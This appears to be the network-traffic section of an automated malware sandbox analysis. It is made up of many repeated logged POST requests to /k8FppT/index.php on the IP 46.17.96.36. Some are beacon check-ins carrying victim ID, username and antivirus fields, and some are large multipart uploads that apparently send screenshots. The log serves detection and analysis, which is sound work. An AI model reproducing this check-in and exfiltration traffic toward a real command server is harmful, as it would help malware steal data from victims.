              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688cHost: 46.17.96.36Content-Length: 107127Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688cHost: 46.17.96.36Content-Length: 107127Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----f8365e60c09cb72ff566abbc48b42f93Host: 46.17.96.36Content-Length: 112208Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688cHost: 46.17.96.36Content-Length: 107127Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688cHost: 46.17.96.36Content-Length: 107127Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688cHost: 46.17.96.36Content-Length: 107127Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688cHost: 46.17.96.36Content-Length: 107127Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1bad195bce5d33d9229615811163fb23Host: 46.17.96.36Content-Length: 111339Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----2c09df93ad9fbf4372f0aa685f89642fHost: 46.17.96.36Content-Length: 110773Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----2c09df93ad9fbf4372f0aa685f89642fHost: 46.17.96.36Content-Length: 110773Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----2c09df93ad9fbf4372f0aa685f89642fHost: 46.17.96.36Content-Length: 110773Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----2c09df93ad9fbf4372f0aa685f89642fHost: 46.17.96.36Content-Length: 110773Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----2c09df93ad9fbf4372f0aa685f89642fHost: 46.17.96.36Content-Length: 110773Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----2c09df93ad9fbf4372f0aa685f89642fHost: 46.17.96.36Content-Length: 110773Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----2c09df93ad9fbf4372f0aa685f89642fHost: 46.17.96.36Content-Length: 110773Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1a6eec0903b36103c3c811a8fa9b0fbdHost: 46.17.96.36Content-Length: 110771Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1a6eec0903b36103c3c811a8fa9b0fbdHost: 46.17.96.36Content-Length: 110771Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1a6eec0903b36103c3c811a8fa9b0fbdHost: 46.17.96.36Content-Length: 110771Cache-Control: no-cache
